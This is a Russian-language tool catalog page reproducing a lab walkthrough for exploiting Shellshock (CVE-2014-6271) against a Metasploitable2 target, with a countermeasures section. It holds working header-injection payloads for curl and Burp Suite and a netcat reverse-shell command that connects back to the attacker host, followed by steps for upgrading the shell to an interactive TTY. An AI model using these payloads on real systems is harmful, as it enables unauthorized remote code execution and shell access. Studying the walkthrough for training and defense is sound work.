Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2014-6271-Shellshock- — Полная современная демонстрационная лаборатория для CVE-2014-6271 (Shellshock), включая архитектуру, шаги эксплуатации, использование Burp Suite, обратные оболочки, контрмеры и полную шпаргалку по командам. | Kitploit
Инструменты/GitHubGitHub/drhaitham/cve-2014-6271-shellshock-
Анализ уязвимостейЭксплуатацияОбратная инженерияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеRed Teaming
Разработка Полезной Нагрузки
Лаборатории и Практика
GitHubdrhaitham/cve-2014-6271-shellshock-

CVE-2014-6271-Shellshock-

Полная современная демонстрационная лаборатория для CVE-2014-6271 (Shellshock), включая архитектуру, шаги эксплуатации, использование Burp Suite, обратные оболочки, контрмеры и полную шпаргалку по командам.

Репозиторий
109 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплуатация Shellshock (CVE-2014-6271): Полная, современная лаборатория для демонстрации

Shellshock (CVE-2014-6271) — одна из самых влиятельных уязвимостей удаленного выполнения кода, когда-либо обнаруженных. Дефект затрагивает Bash и позволяет злоумышленникам выполнять произвольные команды, просто внедряя специально crafted полезные нагрузки в переменные окружения.

Это руководство предоставляет полную, воспроизводимую демонстрацию с использованием:

  • Kali Linux (атакующий)
  • Metasploitable2 (цель)
  • curl, Burp Suite, Netcat
  • Собственноручно созданного CGI-скрипта на Bash

Оно предназначено для обучения, исследований, тренингов и повышения общей осведомленности в области кибербезопасности.


📌 Содержание

  1. Архитектура лаборатории
  2. Создание уязвимого CGI-скрипта
  3. Понимание уязвимости Shellshock
  4. Эксплуатация Shellshock с помощью curl
  5. Эксплуатация Shellshock с помощью Burp Suite
  6. Обратная оболочка через Shellshock
  7. Повышение до полностью интерактивного TTY
  8. Диаграмма цепочки атаки
  9. Галерея скриншотов
  10. Контрмеры
  11. Шпаргалка (все команды)
  12. Эксплуатация Shellshock с помощью Metasploit
  13. Заключение

1. Архитектура лаборатории

КомпонентРольОСIP-адресКлючевые службы
Kali LinuxАтакующийKali Linux (последняя версия)192.168.1.4curl, Burp Suite, Netcat
Metasploitable2Целевой уязвимый серверUbuntu Linux (MSF2)192.168.1.5Apache 2.2, CGI-скрипты, Bash
Apache mod_cgiВыполнение скриптовРаботает на MSF2н/дПредоставляет Bash через CGI
shellshock.shУязвимая точка входаCGI на Bashн/дОтображает переменные окружения

Эта простая конфигурация из двух узлов отражает многие устаревшие развертывания, все еще присутствующие в промышленных системах и системах Интернета вещей.


2. Создание уязвимого CGI-скрипта

На Metasploitable2:

sudo su
cd /usr/lib/cgi-bin/

cat << 'EOF' > shellshock.sh
#!/bin/bash
echo "Content-type: text/html"
echo
echo "<pre>"
env
echo "</pre>"
EOF

chmod +x shellshock.sh
a2enmod cgi
service apache2 restart

Проверьте скрипт с Kali:

curl http://192.168.1.5/cgi-bin/shellshock.sh

Вы должны увидеть отображаемые переменные окружения.


3. Понимание уязвимости Shellshock

Shellshock возникает, когда Bash некорректно анализирует переменные окружения, напоминающие определения функций.

Вредоносная переменная, например:

() { :; }; /bin/bash -c "id"

заставит Bash выполнить команду после определения функции — даже если сама функция никогда не вызывается.

CGI-приложения особенно уязвимы, поскольку HTTP-заголовки автоматически передаются скриптам в качестве переменных окружения.


4. Эксплуатация Shellshock с помощью curl

curl -H 'User-Agent: () { :; }; echo; echo Vulnerable; /bin/bash -c "id"' \
http://192.168.1.5/cgi-bin/shellshock.sh

Вывод должен включать:

Vulnerable
uid=33(www-data)

Это подтверждает удаленное выполнение кода.


5. Эксплуатация Shellshock с помощью Burp Suite

5.1 Отправка обычного запроса

Посетите:

http://192.168.1.5/cgi-bin/shellshock.sh

Отправьте запрос в Repeater.

5.2 Внедрение полезной нагрузки Shellshock

Замените заголовок User-Agent на:

User-Agent: () { :; }; echo; echo BurpTest; /bin/bash -c "id"

5.3 Ответ

Вы должны увидеть:

BurpTest
uid=33(www-data)

Burp Suite наглядно и познавательно подтверждает уязвимость.


6. Обратная оболочка через Shellshock

Запустите слушатель на Kali:

nc -lvnp 4444

Запустите обратную оболочку через CGI-скрипт:

curl -H 'User-Agent: () { :; }; /bin/bash -c "nc 192.168.1.4 4444 -e /bin/bash"' \
http://192.168.1.5/cgi-bin/shellshock.sh

Оболочка подключится обратно к Kali.


7. Повышение до полностью интерактивного TTY

Внутри обратной оболочки:

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

Приостановите сессию:

Ctrl + Z

На Kali:

stty raw -echo; fg

Нажмите Enter.

Теперь у вас есть:

  • автодополнение по Tab
  • клавиши со стрелками
  • управление заданиями
  • полностью интерактивный Bash

8. Диаграмма цепочки атаки

          ┌────────────────────────┐
          │  Атакующий (Kali)      │
          │      192.168.1.4       │
          └───────────┬────────────┘
                      │
     1. Вредоносный HTTP-заголовок (Shellshock)
                      │
                      ▼
        ┌──────────────────────────┐
        │ Веб-сервер Apache (CGI)  │
        │     192.168.1.5          │
        └───────────┬──────────────┘
                    │
   2. Заголовок → Переменная окружения CGI
                    │
                    ▼
      ┌──────────────────────────┐
      │     Bash (Уязвимый)      │
      └───────────┬──────────────┘
                  │
      3. Внедренная команда выполняется
                  │
                  ▼
        ┌─────────────────────────┐
        │  Доступ оболочки www-data│
        └───────────┬─────────────┘
                    │
        4. Обратная оболочка → Kali
                    │
                    ▼
      ┌──────────────────────────┐
      │ Полностью интерактивный  │
      │ TTY                      │
      └──────────────────────────┘

9. Галерея скриншотов

Визуальное прохождение ключевых этапов атаки.

ОписаниеИзображение
Сканирование Nmap + вывод теста Shellshock
Burp Suite – Исходный запрос Shellshock
Burp Suite – Внедрение полезной нагрузки/заголовка
Обратная оболочка, полученная на Kali (nc)

10. Контрмеры

✔ 1. Обновление Bash

Примените патч до версии, которая корректно обрабатывает разбор функций.

✔ 2. Отключение CGI

Устаревший CGI вносит ненужный системный риск.

✔ 3. Очистка HTTP-заголовков

Отбрасывайте подозрительные шаблоны, такие как:

() { :; };

✔ 4. Использование принципа минимальных привилегий

Ограничьте права пользователя веб-сервера (www-data).

✔ 5. Ограничения исходящих соединений

Предотвращает обратные оболочки и утечку данных.

✔ 6. Развертывание межсетевого экрана веб-приложений (WAF)

Скачать инструмент